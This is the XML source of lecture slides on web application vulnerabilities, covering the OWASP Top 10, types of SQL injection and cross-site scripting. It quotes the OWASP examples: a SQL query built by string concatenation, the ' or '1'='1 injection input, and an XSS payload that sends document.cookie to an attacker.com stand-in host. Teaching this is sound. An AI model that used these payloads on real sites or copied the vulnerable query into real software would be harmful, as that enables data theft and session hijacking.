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30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="288" r:id="rId5"/>
    <p:sldId id="347" r:id="rId6"/>
    <p:sldId id="348" r:id="rId7"/>
    <p:sldId id="349" r:id="rId8"/>
    <p:sldId id="350" r:id="rId9"/>
    <p:sldId id="374" r:id="rId10"/>
    <p:sldId id="375" r:id="rId11"/>
    <p:sldId id="351" r:id="rId12"/>
    <p:sldId id="357" r:id="rId13"/>
    <p:sldId id="358" r:id="rId14"/>
    <p:sldId id="359" r:id="rId15"/>
    <p:sldId id="360" r:id="rId16"/>
    <p:sldId id="354" r:id="rId17"/>
    <p:sldId id="355" r:id="rId18"/>
    <p:sldId id="356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82"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1620" y="66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F53F4-D491-422E-A98C-92C82FF8465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3F8D-08C0-4CAA-9913-21E59C41C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2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project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)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Web Application Vulnerabilities                      CSS310 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>2021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Lesson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Broken Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>XML External Entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Broken Access Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Insecure Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Insufficient Logging and Monitoring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 Top 10 in OWASP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dirty="0" smtClean="0"/>
              <a:t>Three most common types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0"/>
              <a:t>ERROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0"/>
              <a:t>BOOLEAN (BLIND BOOLEAN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400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Vulnerability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Exploratory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Very iterative way to get information about a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Throw the database bad commands and gather info about the database with how it returns errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Common for a vulnerability scanner to find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Example: To get a database name, try some function using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>() function (e.g. a convert command)/ The SQL may provide the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> name information.  This is due to a misconfiguration where the error messages are providing an attacker with useful information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Vulnerability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Exploratory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Utilizing an incremental set of commands to get the database to respond</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Often giving it an input that is true and then using the AND expression to give it continual input to get ANOTHER true and seeing how server responds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This was exampled in previous lesson, straight from an OWASP example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>“BLIND” means – server will only produce output when you have met a true condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Boolean (Blind Boolean)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Vulnerability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Very Exploratory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Iterative way to get information on the database, tables, fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Often requires knowledge of different default database names, table names, field names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Significant process of elimination – getting two tables that have the same structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Using UNION SQL commands – either through knowledge of SQL or using tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Once you have table and field names, easy query to then query the contents of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Vulnerability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0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>An application uses untrusted data in the construction of the following vulnerable SQL call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>String query = "SELECT * FROM accounts WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>("id") + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"'";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 smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>attacker modifies the ‘id’ parameter value in their browser to send: ‘ or ‘1’=’1. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>http://example.com/app/accountView?id=' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="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Vulnerability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b="0" dirty="0"/>
              <a:t>Number two on OWASP back in 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Number three on OWASP back in 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>Now number seven on OWASP 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>It is a means to defeat protections for CSFR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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0" dirty="0"/>
              <a:t>The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>' type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>'TEXT‘ value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>attacker modifies the ‘CC’ parameter in the browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>'&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0"/>
              <a:t>='http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0"/>
              <a:t>www.attacker.com/cgi-bin/cookie.cgi?foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>='+document.cookie&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0"/>
              <a:t>&gt;'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0"/>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0"/>
              <a:t>can use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defense the application might employ.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Vulnerability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NonPersistent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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C94719B-EC23-41B0-BA7D-25BB676C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80" y="4141352"/>
            <a:ext cx="2134582" cy="14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A5EB62-1C0C-4901-8215-98AFF83CA5D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3005478" y="2945630"/>
            <a:ext cx="398485" cy="102590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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00600757-93A4-4005-8C73-D04D8819B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478" y="1536861"/>
            <a:ext cx="1574751" cy="10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797F0DDE-A6A9-496D-8E41-1550EA495206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083195" y="5726002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ATTACKER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B51C4715-2592-4465-AED0-BAEE733F4EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187095" y="2752179"/>
            <a:ext cx="18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Sends script code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007E90-5FE5-45BE-8C8D-77F5F20E7E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3300268" y="2824503"/>
            <a:ext cx="989814" cy="1268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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338CD606-18EE-43CF-B8ED-07EE72571BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4063841" y="3273917"/>
            <a:ext cx="227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Site reacts to the code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40941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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C94719B-EC23-41B0-BA7D-25BB676C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3" y="4543964"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00600757-93A4-4005-8C73-D04D8819B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11" y="1939473"/>
            <a:ext cx="1574751" cy="10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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797F0DDE-A6A9-496D-8E41-1550EA495206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284628" y="6128614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ATTACKER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63391F4-F0DA-406C-BE5E-A99681C4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21" y="4495275"/>
            <a:ext cx="2134582" cy="14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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{840C4E5D-AFC3-47FA-B6E2-4BC14E7C0456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296258" y="6007487"/>
            <a:ext cx="8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VICTIM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="Product Photo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B066AB58-EE48-40D6-9174-B4BFAF917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229" y="4611432"/>
            <a:ext cx="1257775" cy="78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F8FEF0-D7E4-495B-A1B5-06B46025CE71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2701595" y="5035640"/>
            <a:ext cx="1374382" cy="240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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D207A511-B513-4879-8DC8-25B6E25096FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4820499" y="539277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Phish</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8000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Review of General Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>Dive into Key Web App Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C94719B-EC23-41B0-BA7D-25BB676C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7" y="4582352"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00600757-93A4-4005-8C73-D04D8819B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65" y="1977861"/>
            <a:ext cx="1574751" cy="10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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797F0DDE-A6A9-496D-8E41-1550EA495206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306982" y="6167002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ATTACKER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63391F4-F0DA-406C-BE5E-A99681C4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903" y="4533663"/>
            <a:ext cx="1935054" cy="14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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{840C4E5D-AFC3-47FA-B6E2-4BC14E7C0456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318612" y="6045875"/>
            <a:ext cx="8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VICTIM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8C32E3-E2C0-40EB-B99A-7168C8AE1416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4192599" y="2674064"/>
            <a:ext cx="1591514" cy="23001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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEADC01-6F6E-4A8D-81B5-DB1227F0598D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670940" y="3919159"/>
            <a:ext cx="181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Sends script code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C2C92D-AE26-4ECF-A385-FD2693D80C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3966356" y="1714072"/>
            <a:ext cx="2355087" cy="2647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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA925E02-9BC1-4F68-93AB-C49535BA1479}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010356" y="2912485"/>
            <a:ext cx="227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Site reacts to the code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12646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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C94719B-EC23-41B0-BA7D-25BB676C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3" y="4474691"/>
            <a:ext cx="2134582" cy="14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Overdraft Protection: Pros and Cons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00600757-93A4-4005-8C73-D04D8819B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11" y="1870200"/>
            <a:ext cx="1574751" cy="10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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{797F0DDE-A6A9-496D-8E41-1550EA495206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284628" y="6059341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ATTACKER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="computer | History, Networking, Operating Systems, &amp; Facts ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63391F4-F0DA-406C-BE5E-A99681C4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549" y="4426002"/>
            <a:ext cx="1935054" cy="14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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{840C4E5D-AFC3-47FA-B6E2-4BC14E7C0456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296258" y="5938214"/>
            <a:ext cx="8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VICTIM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8C32E3-E2C0-40EB-B99A-7168C8AE1416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2701595" y="5362292"/>
            <a:ext cx="317490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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEADC01-6F6E-4A8D-81B5-DB1227F0598D}"/>
